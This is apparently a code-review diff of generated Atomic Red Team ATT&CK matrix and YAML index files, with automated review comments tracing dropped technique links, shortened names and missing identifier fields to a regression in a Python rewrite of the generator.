| | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Video Capture](../../T1125/T1125.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Video Capture](../../T1125/T1125.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Time Providers](../../T1547.003/T1547.003.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Log Enumeration](../../T1654/T1654.md) | | Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
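Review bot: Resource Hijacking (last column) and Outlook Rules (third column) both lose their links to ../../T1496/T1496.md and ../../T1137.005/T1137.005.md and become CONTRIBUTE A TEST placeholders; unless those test directories were removed in the same change, the generator is no longer resolving these techniques. Outlook Rules additionally loses its "Office Application Startup:" prefix, the same inconsistency as in the first hunk.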
@@ -46,7 +46,7 @@
| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | | | | | |
| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Account Manipulation](../../T1098/T1098.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
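Review bot: Domain Controller Authentication (sixth column) loses its link to ../../T1556.001/T1556.001.md and its "Modify Authentication Process:" prefix; the old row shows the test page exists, so this is another case of the generator dropping a resolvable technique rather than a content update.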
@@ -59,7 +59,7 @@
| | | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Account Manipulation](../../T1098/T1098.md) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
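Review bot: Python Startup Hooks (fourth column) loses its link to ../../T1546.018/T1546.018.md and its "Event Triggered Execution:" prefix, following the same pattern as the earlier hunks; the affected techniques are consistently the ones whose names are shortened, which points at the rename logic as the place to look.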
@@ -70,13 +70,13 @@
| | | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | | | | | | | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
| | | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [BITS Jobs](../../T1197/T1197.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | SVG Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
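Review bot: two cells in the third column regress here, Python Startup Hooks (../../T1546.018/T1546.018.md) and Domain Controller Authentication (../../T1556.001/T1556.001.md), both turned into CONTRIBUTE A TEST placeholders; since these are the same techniques that lost their links in the earlier hunks, fix the cause in the generator and regenerate rather than patching the rendered rows.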
@@ -135,7 +135,7 @@
| | | | | Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | | | | | | |
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
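Review bot: this is the fourth place in the file where Domain Controller Authentication (fifth column here) loses its link to ../../T1556.001/T1556.001.md; the link disappears in every column the technique appears in, so the lookup from technique to test directory is failing for it everywhere, not for one cell.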
+8 -18
View File
@@ -11566,7 +11566,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
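Review bot: the `name` value loses the parent-technique prefix (`'Modify Authentication Process: Domain Controller Authentication'` becomes `Domain Controller Authentication`) while the `modified:` timestamp on the line above is unchanged, so this is a change in how the generator composes the name, not an upstream ATT&CK data update. If the goal of the Python conversion is parity with the previous output, the new generator should keep emitting `parent: sub-technique` for sub-techniques; if the bare STIX name is the new convention, say so in the commit message (currently just `python conversion`) and confirm that entries with populated `atomic_tests` are rendered the same way, since consumers matching on the full name will otherwise miss these techniques.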
@@ -11596,7 +11596,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
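Review bot: `identifier: T1556.001` is removed and nothing in the hunk replaces it, leaving `technique:` followed directly by `atomic_tests: []`, so any consumer that reads `identifier` from the entry rather than from the enclosing map key now gets a missing field. The removal appears in exactly the hunks whose entries have `atomic_tests: []`, which points to the Python generator's empty-tests path omitting the key; if the populated-tests path still emits it, the index schema is now inconsistent between the two. Either emit `identifier` from both paths or drop it everywhere, and add a check that compares the key set per entry between the old and new index output.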
@@ -20754,7 +20753,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20790,7 +20789,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -23637,7 +23635,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23660,7 +23658,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27968,7 +27965,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27989,7 +27986,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -32777,7 +32773,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -32813,7 +32809,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -33299,7 +33294,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -33329,7 +33324,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -35100,7 +35094,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -35127,7 +35121,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -35529,7 +35522,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
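Review bot: this hunk removes `identifier: T1659` with no accompanying `name` change, unlike the sub-technique hunks above; T1659 is a parent technique with no `parent: child` prefix to strip, so the identifier loss is independent of the renaming and is tied purely to entries with `atomic_tests: []`. The same hunk recurs in every index file in this compare, so the fix belongs in the generator's empty-tests path rather than in the generated files.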
@@ -45665,7 +45657,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -45695,7 +45687,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -57541,7 +57532,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
+8 -18
View File
@@ -11541,7 +11541,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11571,7 +11571,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20412,7 +20411,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20448,7 +20447,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -23405,7 +23403,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23428,7 +23426,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27835,7 +27832,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27856,7 +27853,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -32214,7 +32210,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -32250,7 +32246,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32736,7 +32731,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32766,7 +32761,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -34578,7 +34572,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -34605,7 +34599,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -35007,7 +35000,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -44942,7 +44934,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44972,7 +44964,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -56886,7 +56877,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
+8 -18
View File
